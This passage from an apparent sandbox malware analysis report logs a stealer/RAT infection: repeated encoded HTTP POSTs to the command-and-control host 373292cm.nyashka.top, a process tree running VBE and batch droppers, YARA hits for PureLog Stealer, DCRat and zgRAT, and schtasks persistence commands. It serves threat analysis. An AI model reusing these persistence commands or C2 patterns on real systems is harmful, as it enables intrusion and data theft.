                              105 | 192.168.2.5 | 59962 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:58.949229002 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:59.309318066 CEST | 1808 | OUT | Data Raw:
                              Aug 25, 2024 15:44:59.607373953 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:59.730150938 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              106 | 192.168.2.5 | 59963 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:59.139019012 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:59.514998913 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:59.811819077 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:59.938560009 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              107 | 192.168.2.5 | 59964 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:00.071594954 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:45:00.429095030 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:45:00.748614073 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:00.953639030 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              108 | 192.168.2.5 | 59965 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:01.087779045 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:01.444531918 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:45:01.758934975 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:01.890233994 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              109 | 192.168.2.5 | 59966 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:02.097172976 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:02.444523096 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:45:02.759957075 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:02.956305027 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              110 | 192.168.2.5 | 59967 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:03.103687048 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:03.460359097 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:45:03.768834114 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:03.902116060 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              111 | 192.168.2.5 | 59968 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:04.029376984 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:04.382008076 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:45:04.712289095 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:04.893264055 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              112 | 192.168.2.5 | 59969 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:05.008440018 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:05.366764069 CEST | 1828 | OUT | Data Raw:
                              Aug 25, 2024 15:45:05.673413992 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:05.801935911 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0d 29 25 0c 58 31 15 0a 52 33 30 26 1e 29 13 37 13 3d 04 25 14 25 2b 39 5f 32 00 3c 1e 26 3b 21 12 3f 00 32 14 26 3c 24 00 3a 34 2b 5d 0c 13 22 16 34 04 25 04 25 5a 37 05 2a 5e 37 5f 22 3f 35 02 28 3a 3d 18 3c 3f 3c 1d 2b 07 24 03 28 03 3e 11 2f 01 2a 07 2e 1e 04 50 37 04 2b 52 0d 11 24 54 3c 2e 32 0d 2a 00 15 1a 35 01 33 5b 27 2d 2a 13 25 0b 32 1d 24 5f 20 1f 27 31 35 1c 27 21 3d 1f 31 3b 31 01 25 2f 21 57 36 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %)%X1R30&)7=%%+9_2<&;!?2&<$:4+]"4%%Z7*^7_"?5(:=<?<+$(>/*.P7+R$T<.2*53['-*%2$_ '15'!=1;1%/!W62#T,"W3UV


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              113 | 192.168.2.5 | 59970 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:05.053097010 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:05.397761106 CEST2500OUTData Raw: 5f 53 59 55 54 48 51 5d 5b 5f 5a 51 59 57 58 55 57 59 5d 5b 57 5f 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYUTHQ][_ZQYWXUWY][W_S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-83"-+ V%)> Y(X9?+[ /4#!Q?9 =X,&F$.Y/-
                              Aug 25, 2024 15:45:05.766819954 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:05.901094913 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              114 | 192.168.2.5 | 59971 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:06.025188923 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:45:06.382245064 CEST2504OUTData Raw: 5a 50 5c 55 51 42 51 5e 5b 5f 5a 51 59 5f 58 54 57 5a 5d 53 57 5d 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\UQBQ^[_ZQY_XTWZ]SW]SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8U 6>?#V=)-(%(]#,7 #<7\ 5^8&F$.Y/
                              Aug 25, 2024 15:45:06.696506023 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:06.830126047 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              115 | 192.168.2.5 | 59972 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:45:07.202613115 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:08.788630962 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:08.788970947 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:08.789200068 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:13.602370024 CEST2504OUTData Raw: 5f 5d 5c 53 54 47 51 5b 5b 5f 5a 51 59 53 58 54 57 5c 5d 5e 57 51 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STGQ[[_ZQYSXTW\]^WQSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;6.<\#\).(X>>*<?"<7W3+9 73%]8&F$.Y/5
                              Aug 25, 2024 15:45:13.913201094 CEST1236OUTData Raw: 5f 5d 5c 53 54 47 51 5b 5b 5f 5a 51 59 53 58 54 57 5c 5d 5e 57 51 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STGQ[[_ZQYSXTW\]^WQSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;6.<\#\).(X>>*<?"<7W3+9 73%]8&F$.Y/5
                              Aug 25, 2024 15:45:14.017232895 CEST1268OUTData Raw: 3f 59 3c 50 38 30 01 28 01 01 19 14 3b 0a 00 06 2c 07 03 45 35 3b 1d 1a 06 3e 5f 1d 04 1c 26 3a 3c 30 20 1f 3d 29 24 24 31 22 3f 2c 3a 08 0b 0e 31 40 2d 1b 31 05 28 19 08 20 21 3f 2b 31 02 06 31 59 0b 5f 39 3b 1c 2b 32 5b 20 13 3a 38 08 25 37 5a
                              Data Ascii: ?Y<P80(;,E5;>_&:<0 =)$$1"?,:1@-1( !?+11Y_9;+2[ :8%7Z*=>0>5U$3<#*%[<>6:6;9R+.$6:=,:Z4T1&7_4 90)4,4?6\_/:==+9!="&3E;&Y1YY+$&685?$=;2X9&<(^?>U, ,1#<5!:01/[? 1:
                              Aug 25, 2024 15:45:14.315907955 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Target ID:0
                              Start time:09:42:59
                              Start date:25/08/2024
                              Path:C:\Users\user\Desktop\Nerolore.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Nerolore.exe"
                              Imagebase:0xf00000
                              File size:3'514'624 bytes
                              MD5 hash:173524B924DF7F85FC534A492707F643
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:09:43:00
                              Start date:25/08/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe"
                              Imagebase:0xe60000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:3
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Imagebase:0x790000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\FontHost/ContainerAgentWinSession.exe"
                              Imagebase:0xa40000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Imagebase:0x7ff746e70000
                              File size:2'759'232 bytes
                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:11
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"
                              Imagebase:0x7ff779cd0000
                              File size:52'744 bytes
                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:13
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Imagebase:0x7ff746e70000
                              File size:2'759'232 bytes
                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:14
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"
                              Imagebase:0x7ff779cd0000
                              File size:52'744 bytes
                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:16
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff6068e0000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:09:43:18
                              Start date:25/08/2024
